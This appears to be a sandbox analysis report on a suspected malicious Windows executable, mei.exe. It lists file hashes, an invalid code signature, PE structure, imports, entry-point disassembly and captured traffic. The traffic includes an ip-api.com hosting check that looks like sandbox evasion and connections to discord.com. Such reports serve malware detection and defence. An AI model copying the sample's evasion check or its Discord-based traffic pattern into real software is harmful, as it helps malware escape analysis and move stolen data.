                                                                                                                                                                    \Device\ConDrv

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):97
                                                                                                                                                                    Entropy (8bit):4.331807756485642
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:lyAZFXZDLsFzAXmZrCZDL4QXAVJK4v:lyqBtoJAXmoZDL4CA1v
                                                                                                                                                                    MD5:195D02DA13D597A52F848A9B28D871F6
                                                                                                                                                                    SHA1:D048766A802C61655B9689E953103236EACCB1C7
                                                                                                                                                                    SHA-256:ADE5C28A2B27B13EFB1145173481C1923CAF78648E49205E7F412A2BEFC7716A
                                                                                                                                                                    SHA-512:1B9EDA54315B0F8DB8E43EC6E78996464A90E84DE721611647E8395DBE259C282F06FB6384B08933F8F0B452B42E23EE5A7439974ACC5F53DAD64B08D39F4146
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                    Preview:..Service Version: 0.0.0.0..Engine Version: 0.0.0.0....No engine/signature is currently loaded...

                                                                                                                                                                    Static File Info

                                                                                                                                                                    General

                                                                                                                                                                    File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Entropy (8bit):7.994244096439802
                                                                                                                                                                    TrID:
                                                                                                                                                                    • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                    • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                    File name:mei.exe
                                                                                                                                                                    File size:8'593'769 bytes
                                                                                                                                                                    MD5:b5479bf5c97cfa81c02676bb9335ab24
                                                                                                                                                                    SHA1:e823a36420bdeccfd8e4c6ad9d14e863263caac7
                                                                                                                                                                    SHA256:02c36b712aeaad34359c72311c8624062ea5dfc6311a15ed2b46b403470c3bc0
                                                                                                                                                                    SHA512:7fd4dac8048bb1952f479bd14e32d0ceced93a546ae1c966fef0710cf195f45da077e045c3b383f6c8e3151f27b7c63b1906080102640f704efb6319b7142acf
                                                                                                                                                                    SSDEEP:196608:7x0cD9zMLjv+bhqNVoBKUh8mz4Iv9PzQ1u1D7wJM:Ki9zcL+9qz8/b4IC1uRmM
                                                                                                                                                                    TLSH:1F863325A3850CE5E82B963AC286D11E9B7336631760D5DB53F897392F038E5D83BB02
                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........y~M..-M..-M..-...,E..-...,...-...,G..-X..-I..-X..,e..-X..,\..-X..,D..-...,F..-M..-...-t..,X..-t..,L..-RichM..-...............

                                                                                                                                                                    File Icon

                                                                                                                                                                    Icon Hash:90cececece8e8eb0

                                                                                                                                                                    Static PE Info

                                                                                                                                                                    General

                                                                                                                                                                    Entrypoint:0x14000c1a0
                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                    Digitally signed:true
                                                                                                                                                                    Imagebase:0x140000000
                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                    Time Stamp:0x656EB46D [Tue Dec 5 05:26:05 2023 UTC]
                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                    OS Version Major:5
                                                                                                                                                                    OS Version Minor:2
                                                                                                                                                                    File Version Major:5
                                                                                                                                                                    File Version Minor:2
                                                                                                                                                                    Subsystem Version Major:5
                                                                                                                                                                    Subsystem Version Minor:2
                                                                                                                                                                    Import Hash:1af6c885af093afc55142c2f1761dbe8

                                                                                                                                                                    Authenticode Signature

                                                                                                                                                                    Signature Valid:false
                                                                                                                                                                    Signature Issuer:CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
                                                                                                                                                                    Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                    Error Number:-2146869232
                                                                                                                                                                    Not Before, Not After
                                                                                                                                                                    • 29/09/2021 01:00:00 29/09/2024 00:59:59
                                                                                                                                                                    Subject Chain
                                                                                                                                                                    • CN=Akeo Consulting, O=Akeo Consulting, S=Donegal, C=IE, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=IE, SERIALNUMBER=407950
                                                                                                                                                                    Version:3
                                                                                                                                                                    Thumbprint MD5:5C82B2D08EFE6EE0794B52D4309C5F37
                                                                                                                                                                    Thumbprint SHA-1:3DBC3A2A0E9CE8803B422CFDBC60ACD33164965D
                                                                                                                                                                    Thumbprint SHA-256:60E992275CC7503A3EBA5D391DB8AEAAAB001402D49AEA3F7F5DA3706DF97327
                                                                                                                                                                    Serial:00BFB15001BBF592D4962A7797EA736FA3

                                                                                                                                                                    Entrypoint Preview

                                                                                                                                                                    Instruction
                                                                                                                                                                    dec eax
                                                                                                                                                                    sub esp, 28h
                                                                                                                                                                    call 00007F4B44D8944Ch
                                                                                                                                                                    dec eax
                                                                                                                                                                    add esp, 28h
                                                                                                                                                                    jmp 00007F4B44D8905Fh
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    dec eax
                                                                                                                                                                    sub esp, 28h
                                                                                                                                                                    call 00007F4B44D899C4h
                                                                                                                                                                    test eax, eax
                                                                                                                                                                    je 00007F4B44D89203h
                                                                                                                                                                    dec eax
                                                                                                                                                                    mov eax, dword ptr [00000030h]
                                                                                                                                                                    dec eax
                                                                                                                                                                    mov ecx, dword ptr [eax+08h]
                                                                                                                                                                    jmp 00007F4B44D891E7h
                                                                                                                                                                    dec eax
                                                                                                                                                                    cmp ecx, eax
                                                                                                                                                                    je 00007F4B44D891F6h
                                                                                                                                                                    xor eax, eax
                                                                                                                                                                    dec eax
                                                                                                                                                                    cmpxchg dword ptr [000342CCh], ecx
                                                                                                                                                                    jne 00007F4B44D891D0h
                                                                                                                                                                    xor al, al
                                                                                                                                                                    dec eax
                                                                                                                                                                    add esp, 28h
                                                                                                                                                                    ret
                                                                                                                                                                    mov al, 01h
                                                                                                                                                                    jmp 00007F4B44D891D9h
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    inc eax
                                                                                                                                                                    push ebx
                                                                                                                                                                    dec eax
                                                                                                                                                                    sub esp, 20h
                                                                                                                                                                    movzx eax, byte ptr [000342B7h]
                                                                                                                                                                    test ecx, ecx
                                                                                                                                                                    mov ebx, 00000001h
                                                                                                                                                                    cmove eax, ebx
                                                                                                                                                                    mov byte ptr [000342A7h], al
                                                                                                                                                                    call 00007F4B44D897C3h
                                                                                                                                                                    call 00007F4B44D8A8E2h
                                                                                                                                                                    test al, al
                                                                                                                                                                    jne 00007F4B44D891E6h
                                                                                                                                                                    xor al, al
                                                                                                                                                                    jmp 00007F4B44D891F6h
                                                                                                                                                                    call 00007F4B44D97781h
                                                                                                                                                                    test al, al
                                                                                                                                                                    jne 00007F4B44D891EBh
                                                                                                                                                                    xor ecx, ecx
                                                                                                                                                                    call 00007F4B44D8A8F2h
                                                                                                                                                                    jmp 00007F4B44D891CCh
                                                                                                                                                                    mov al, bl
                                                                                                                                                                    dec eax
                                                                                                                                                                    add esp, 20h
                                                                                                                                                                    pop ebx
                                                                                                                                                                    ret
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    inc eax
                                                                                                                                                                    push ebx
                                                                                                                                                                    dec eax
                                                                                                                                                                    sub esp, 20h
                                                                                                                                                                    cmp byte ptr [0003426Ch], 00000000h
                                                                                                                                                                    mov ebx, ecx
                                                                                                                                                                    jne 00007F4B44D89249h
                                                                                                                                                                    cmp ecx, 01h
                                                                                                                                                                    jnbe 00007F4B44D8924Ch
                                                                                                                                                                    call 00007F4B44D8992Ah
                                                                                                                                                                    test eax, eax
                                                                                                                                                                    je 00007F4B44D8920Ah

                                                                                                                                                                    Data Directories

                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x3cdc40x78.rdata
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x460000x94c.rsrc
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x420000x2280.pdata
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x82fd210x2448
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x470000x75c.reloc
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x3a3300x1c.rdata
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x3a1f00x140.rdata
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x2b0000x420.rdata
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                    Sections

                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                    .text0x10000x29b400x29c00False0.5530735404191617data6.486836379301198IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                    .rdata0x2b0000x12bec0x12c00False0.5183854166666667data5.835118207850638IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                    .data0x3e0000x33380xe00False0.1328125Matlab v4 mat-file (little endian) f\324\377\3772\242\337-\231+, text, rows 4294967295, columns 01.8271683819747706IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                    .pdata0x420000x22800x2400False0.4736328125data5.3141353008647245IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                    _RDATA0x450000x15c0x200False0.388671875data2.7898294787301503IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                    .rsrc0x460000x94c0xa00False0.4359375data5.115392825790756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                    .reloc0x470000x75c0x800False0.5458984375data5.240127521097618IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                    Resources

                                                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                    RT_VERSION0x460a00x39cdata0.474025974025974
                                                                                                                                                                    RT_MANIFEST0x4643c0x50dXML 1.0 document, ASCII text0.4694508894044857

                                                                                                                                                                    Imports

                                                                                                                                                                    DLLImport
                                                                                                                                                                    USER32.dllCreateWindowExW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
                                                                                                                                                                    COMCTL32.dll
                                                                                                                                                                    KERNEL32.dllIsValidCodePage, GetStringTypeW, GetFileAttributesExW, HeapReAlloc, FlushFileBuffers, GetCurrentDirectoryW, GetACP, GetOEMCP, GetModuleHandleW, MulDiv, GetLastError, SetDllDirectoryW, GetModuleFileNameW, CreateSymbolicLinkW, GetProcAddress, GetCommandLineW, GetEnvironmentVariableW, GetCPInfo, ExpandEnvironmentStringsW, CreateDirectoryW, GetTempPathW, WaitForSingleObject, Sleep, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LoadLibraryExW, SetConsoleCtrlHandler, FindClose, FindFirstFileExW, CloseHandle, GetCurrentProcess, LocalFree, FormatMessageW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, WriteConsoleW, SetEndOfFile, SetEnvironmentVariableW, RtlUnwindEx, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, CreateFileW, GetDriveTypeW, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, GetFullPathNameW, RemoveDirectoryW, FindNextFileW, SetStdHandle, DeleteFileW, ReadFile, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, CompareStringW, LCMapStringW
                                                                                                                                                                    ADVAPI32.dllOpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
                                                                                                                                                                    GDI32.dllSelectObject, DeleteObject, CreateFontIndirectW

                                                                                                                                                                    Network Behavior

                                                                                                                                                                    Network Port Distribution

                                                                                                                                                                    TCP Packets

                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                    Dec 6, 2023 09:24:06.593527079 CET4973480192.168.2.4208.95.112.1
                                                                                                                                                                    Dec 6, 2023 09:24:06.687987089 CET8049734208.95.112.1192.168.2.4
                                                                                                                                                                    Dec 6, 2023 09:24:06.691636086 CET4973480192.168.2.4208.95.112.1
                                                                                                                                                                    Dec 6, 2023 09:24:06.691800117 CET4973480192.168.2.4208.95.112.1
                                                                                                                                                                    Dec 6, 2023 09:24:06.788235903 CET8049734208.95.112.1192.168.2.4
                                                                                                                                                                    Dec 6, 2023 09:24:06.792251110 CET4973480192.168.2.4208.95.112.1
                                                                                                                                                                    Dec 6, 2023 09:24:06.886585951 CET8049734208.95.112.1192.168.2.4
                                                                                                                                                                    Dec 6, 2023 09:24:06.886687040 CET4973480192.168.2.4208.95.112.1
                                                                                                                                                                    Dec 6, 2023 09:24:36.377216101 CET4974280192.168.2.4208.95.112.1
                                                                                                                                                                    Dec 6, 2023 09:24:36.471662998 CET8049742208.95.112.1192.168.2.4
                                                                                                                                                                    Dec 6, 2023 09:24:36.471956015 CET4974280192.168.2.4208.95.112.1
                                                                                                                                                                    Dec 6, 2023 09:24:36.472079039 CET4974280192.168.2.4208.95.112.1
                                                                                                                                                                    Dec 6, 2023 09:24:36.614074945 CET8049742208.95.112.1192.168.2.4
                                                                                                                                                                    Dec 6, 2023 09:24:36.935125113 CET8049742208.95.112.1192.168.2.4
                                                                                                                                                                    Dec 6, 2023 09:24:36.978125095 CET4974280192.168.2.4208.95.112.1
                                                                                                                                                                    Dec 6, 2023 09:24:37.342514992 CET49743443192.168.2.4162.159.136.232
                                                                                                                                                                    Dec 6, 2023 09:24:37.342602968 CET44349743162.159.136.232192.168.2.4
                                                                                                                                                                    Dec 6, 2023 09:24:37.342695951 CET49743443192.168.2.4162.159.136.232
                                                                                                                                                                    Dec 6, 2023 09:24:37.373316050 CET49743443192.168.2.4162.159.136.232
                                                                                                                                                                    Dec 6, 2023 09:24:37.373351097 CET44349743162.159.136.232192.168.2.4
                                                                                                                                                                    Dec 6, 2023 09:24:37.582768917 CET44349743162.159.136.232192.168.2.4
                                                                                                                                                                    Dec 6, 2023 09:24:37.583419085 CET49743443192.168.2.4162.159.136.232
                                                                                                                                                                    Dec 6, 2023 09:24:37.583463907 CET44349743162.159.136.232192.168.2.4
                                                                                                                                                                    Dec 6, 2023 09:24:37.584534883 CET44349743162.159.136.232192.168.2.4
                                                                                                                                                                    Dec 6, 2023 09:24:37.584618092 CET49743443192.168.2.4162.159.136.232
                                                                                                                                                                    Dec 6, 2023 09:24:37.585961103 CET49743443192.168.2.4162.159.136.232
                                                                                                                                                                    Dec 6, 2023 09:24:37.586035013 CET44349743162.159.136.232192.168.2.4
                                                                                                                                                                    Dec 6, 2023 09:24:37.586289883 CET49743443192.168.2.4162.159.136.232
                                                                                                                                                                    Dec 6, 2023 09:24:37.586304903 CET44349743162.159.136.232192.168.2.4
                                                                                                                                                                    Dec 6, 2023 09:24:37.586412907 CET49743443192.168.2.4162.159.136.232
                                                                                                                                                                    Dec 6, 2023 09:24:37.586457014 CET44349743162.159.136.232192.168.2.4
                                                                                                                                                                    Dec 6, 2023 09:24:37.586597919 CET49743443192.168.2.4162.159.136.232
                                                                                                                                                                    Dec 6, 2023 09:24:37.586642981 CET44349743162.159.136.232192.168.2.4
                                                                                                                                                                    Dec 6, 2023 09:24:37.586846113 CET49743443192.168.2.4162.159.136.232
                                                                                                                                                                    Dec 6, 2023 09:24:37.586895943 CET44349743162.159.136.232192.168.2.4
                                                                                                                                                                    Dec 6, 2023 09:24:37.587095976 CET49743443192.168.2.4162.159.136.232
                                                                                                                                                                    Dec 6, 2023 09:24:37.587143898 CET44349743162.159.136.232192.168.2.4
                                                                                                                                                                    Dec 6, 2023 09:24:37.587323904 CET49743443192.168.2.4162.159.136.232
                                                                                                                                                                    Dec 6, 2023 09:24:37.587347984 CET44349743162.159.136.232192.168.2.4
                                                                                                                                                                    Dec 6, 2023 09:24:37.587400913 CET49743443192.168.2.4162.159.136.232
                                                                                                                                                                    Dec 6, 2023 09:24:37.587419987 CET44349743162.159.136.232192.168.2.4
                                                                                                                                                                    Dec 6, 2023 09:24:37.587421894 CET49743443192.168.2.4162.159.136.232
                                                                                                                                                                    Dec 6, 2023 09:24:37.587439060 CET44349743162.159.136.232192.168.2.4
                                                                                                                                                                    Dec 6, 2023 09:24:37.587805986 CET49743443192.168.2.4162.159.136.232
                                                                                                                                                                    Dec 6, 2023 09:24:37.587827921 CET44349743162.159.136.232192.168.2.4
                                                                                                                                                                    Dec 6, 2023 09:24:37.587866068 CET49743443192.168.2.4162.159.136.232
                                                                                                                                                                    Dec 6, 2023 09:24:37.587882996 CET44349743162.159.136.232192.168.2.4
                                                                                                                                                                    Dec 6, 2023 09:24:37.587913990 CET49743443192.168.2.4162.159.136.232
                                                                                                                                                                    Dec 6, 2023 09:24:37.587929010 CET44349743162.159.136.232192.168.2.4
                                                                                                                                                                    Dec 6, 2023 09:24:37.587953091 CET49743443192.168.2.4162.159.136.232
                                                                                                                                                                    Dec 6, 2023 09:24:37.587985992 CET44349743162.159.136.232192.168.2.4
                                                                                                                                                                    Dec 6, 2023 09:24:37.588100910 CET49743443192.168.2.4162.159.136.232
                                                                                                                                                                    Dec 6, 2023 09:24:37.588121891 CET44349743162.159.136.232192.168.2.4
                                                                                                                                                                    Dec 6, 2023 09:24:37.588154078 CET49743443192.168.2.4162.159.136.232
                                                                                                                                                                    Dec 6, 2023 09:24:37.588169098 CET44349743162.159.136.232192.168.2.4
                                                                                                                                                                    Dec 6, 2023 09:24:37.588195086 CET49743443192.168.2.4162.159.136.232
                                                                                                                                                                    Dec 6, 2023 09:24:37.588212967 CET44349743162.159.136.232192.168.2.4
                                                                                                                                                                    Dec 6, 2023 09:24:37.588249922 CET49743443192.168.2.4162.159.136.232
                                                                                                                                                                    Dec 6, 2023 09:24:37.588268995 CET44349743162.159.136.232192.168.2.4
                                                                                                                                                                    Dec 6, 2023 09:24:37.588318110 CET49743443192.168.2.4162.159.136.232
                                                                                                                                                                    Dec 6, 2023 09:24:37.588335991 CET44349743162.159.136.232192.168.2.4
                                                                                                                                                                    Dec 6, 2023 09:24:37.588413954 CET49743443192.168.2.4162.159.136.232
                                                                                                                                                                    Dec 6, 2023 09:24:37.588433981 CET44349743162.159.136.232192.168.2.4
                                                                                                                                                                    Dec 6, 2023 09:24:37.588473082 CET49743443192.168.2.4162.159.136.232
                                                                                                                                                                    Dec 6, 2023 09:24:37.588521957 CET49743443192.168.2.4162.159.136.232
                                                                                                                                                                    Dec 6, 2023 09:24:37.588541985 CET49743443192.168.2.4162.159.136.232
                                                                                                                                                                    Dec 6, 2023 09:24:37.588578939 CET49743443192.168.2.4162.159.136.232
                                                                                                                                                                    Dec 6, 2023 09:24:37.588615894 CET49743443192.168.2.4162.159.136.232
                                                                                                                                                                    Dec 6, 2023 09:24:37.588655949 CET49743443192.168.2.4162.159.136.232
                                                                                                                                                                    Dec 6, 2023 09:24:37.628741026 CET44349743162.159.136.232192.168.2.4
                                                                                                                                                                    Dec 6, 2023 09:24:37.629049063 CET49743443192.168.2.4162.159.136.232
                                                                                                                                                                    Dec 6, 2023 09:24:37.629079103 CET44349743162.159.136.232192.168.2.4
                                                                                                                                                                    Dec 6, 2023 09:24:37.629108906 CET49743443192.168.2.4162.159.136.232
                                                                                                                                                                    Dec 6, 2023 09:24:37.629127979 CET44349743162.159.136.232192.168.2.4
                                                                                                                                                                    Dec 6, 2023 09:24:37.629158974 CET49743443192.168.2.4162.159.136.232
                                                                                                                                                                    Dec 6, 2023 09:24:37.629178047 CET44349743162.159.136.232192.168.2.4
                                                                                                                                                                    Dec 6, 2023 09:24:37.629215956 CET49743443192.168.2.4162.159.136.232
                                                                                                                                                                    Dec 6, 2023 09:24:37.629246950 CET44349743162.159.136.232192.168.2.4
                                                                                                                                                                    Dec 6, 2023 09:24:37.629277945 CET49743443192.168.2.4162.159.136.232
                                                                                                                                                                    Dec 6, 2023 09:24:37.629298925 CET44349743162.159.136.232192.168.2.4
                                                                                                                                                                    Dec 6, 2023 09:24:37.629317045 CET49743443192.168.2.4162.159.136.232
                                                                                                                                                                    Dec 6, 2023 09:24:37.629336119 CET49743443192.168.2.4162.159.136.232
                                                                                                                                                                    Dec 6, 2023 09:24:37.629348993 CET49743443192.168.2.4162.159.136.232
                                                                                                                                                                    Dec 6, 2023 09:24:37.629391909 CET49743443192.168.2.4162.159.136.232
                                                                                                                                                                    Dec 6, 2023 09:24:37.629416943 CET49743443192.168.2.4162.159.136.232
                                                                                                                                                                    Dec 6, 2023 09:24:37.629441977 CET49743443192.168.2.4162.159.136.232
                                                                                                                                                                    Dec 6, 2023 09:24:37.629477024 CET49743443192.168.2.4162.159.136.232
                                                                                                                                                                    Dec 6, 2023 09:24:37.629499912 CET49743443192.168.2.4162.159.136.232
                                                                                                                                                                    Dec 6, 2023 09:24:37.629534006 CET49743443192.168.2.4162.159.136.232
                                                                                                                                                                    Dec 6, 2023 09:24:37.629592896 CET49743443192.168.2.4162.159.136.232
                                                                                                                                                                    Dec 6, 2023 09:24:37.629622936 CET49743443192.168.2.4162.159.136.232
                                                                                                                                                                    Dec 6, 2023 09:24:37.629705906 CET49743443192.168.2.4162.159.136.232
                                                                                                                                                                    Dec 6, 2023 09:24:37.629745960 CET49743443192.168.2.4162.159.136.232
                                                                                                                                                                    Dec 6, 2023 09:24:37.672749043 CET44349743162.159.136.232192.168.2.4
                                                                                                                                                                    Dec 6, 2023 09:24:37.673171997 CET49743443192.168.2.4162.159.136.232
                                                                                                                                                                    Dec 6, 2023 09:24:37.673207998 CET49743443192.168.2.4162.159.136.232
                                                                                                                                                                    Dec 6, 2023 09:24:37.716742992 CET44349743162.159.136.232192.168.2.4
                                                                                                                                                                    Dec 6, 2023 09:24:38.845263004 CET44349743162.159.136.232192.168.2.4
                                                                                                                                                                    Dec 6, 2023 09:24:38.845330954 CET44349743162.159.136.232192.168.2.4
                                                                                                                                                                    Dec 6, 2023 09:24:38.845360994 CET44349743162.159.136.232192.168.2.4
                                                                                                                                                                    Dec 6, 2023 09:24:38.845443010 CET44349743162.159.136.232192.168.2.4
                                                                                                                                                                    Dec 6, 2023 09:24:38.845474005 CET49743443192.168.2.4162.159.136.232
                                                                                                                                                                    Dec 6, 2023 09:24:38.845587015 CET49743443192.168.2.4162.159.136.232
                                                                                                                                                                    Dec 6, 2023 09:24:38.846661091 CET49743443192.168.2.4162.159.136.232
                                                                                                                                                                    Dec 6, 2023 09:24:38.856576920 CET4974280192.168.2.4208.95.112.1
                                                                                                                                                                    Dec 6, 2023 09:24:38.950968981 CET8049742208.95.112.1192.168.2.4
                                                                                                                                                                    Dec 6, 2023 09:24:38.951044083 CET4974280192.168.2.4208.95.112.1

                                                                                                                                                                    UDP Packets

                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                    Dec 6, 2023 09:24:05.078068018 CET6139053192.168.2.41.1.1.1
                                                                                                                                                                    Dec 6, 2023 09:24:05.175081968 CET53613901.1.1.1192.168.2.4
                                                                                                                                                                    Dec 6, 2023 09:24:06.490470886 CET6029953192.168.2.41.1.1.1
                                                                                                                                                                    Dec 6, 2023 09:24:06.585920095 CET53602991.1.1.1192.168.2.4
                                                                                                                                                                    Dec 6, 2023 09:24:37.245526075 CET6205253192.168.2.41.1.1.1
                                                                                                                                                                    Dec 6, 2023 09:24:37.340899944 CET53620521.1.1.1192.168.2.4

                                                                                                                                                                    DNS Queries

                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                    Dec 6, 2023 09:24:05.078068018 CET192.168.2.41.1.1.10xd89dStandard query (0)blank-kwj1y.inA (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 6, 2023 09:24:06.490470886 CET192.168.2.41.1.1.10xe1dcStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 6, 2023 09:24:37.245526075 CET192.168.2.41.1.1.10x3734Standard query (0)discord.comA (IP address)IN (0x0001)false

                                                                                                                                                                    DNS Answers

                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                    Dec 6, 2023 09:24:05.175081968 CET1.1.1.1192.168.2.40xd89dName error (3)blank-kwj1y.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 6, 2023 09:24:06.585920095 CET1.1.1.1192.168.2.40xe1dcNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 6, 2023 09:24:37.340899944 CET1.1.1.1192.168.2.40x3734No error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 6, 2023 09:24:37.340899944 CET1.1.1.1192.168.2.40x3734No error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 6, 2023 09:24:37.340899944 CET1.1.1.1192.168.2.40x3734No error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 6, 2023 09:24:37.340899944 CET1.1.1.1192.168.2.40x3734No error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                                                                                                                    Dec 6, 2023 09:24:37.340899944 CET1.1.1.1192.168.2.40x3734No error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false

                                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                                    • discord.com
                                                                                                                                                                    • ip-api.com

                                                                                                                                                                    HTTP Packets

                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    0192.168.2.449734208.95.112.1807484C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Dec 6, 2023 09:24:06.691800117 CET171OUTGET /line/?fields=hosting HTTP/1.1
                                                                                                                                                                    Host: ip-api.com
                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                    User-Agent: python-urllib3/2.1.0
                                                                                                                                                                    Dec 6, 2023 09:24:06.788235903 CET229INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Wed, 06 Dec 2023 08:24:06 GMT
                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                    Content-Length: 6
                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                    X-Ttl: 60
                                                                                                                                                                    X-Rl: 44
                                                                                                                                                                    Data Raw: 66 61 6c 73 65 0a
                                                                                                                                                                    Data Ascii: false


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    1192.168.2.449742208.95.112.1807484C:\Users\user\Desktop\mei.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
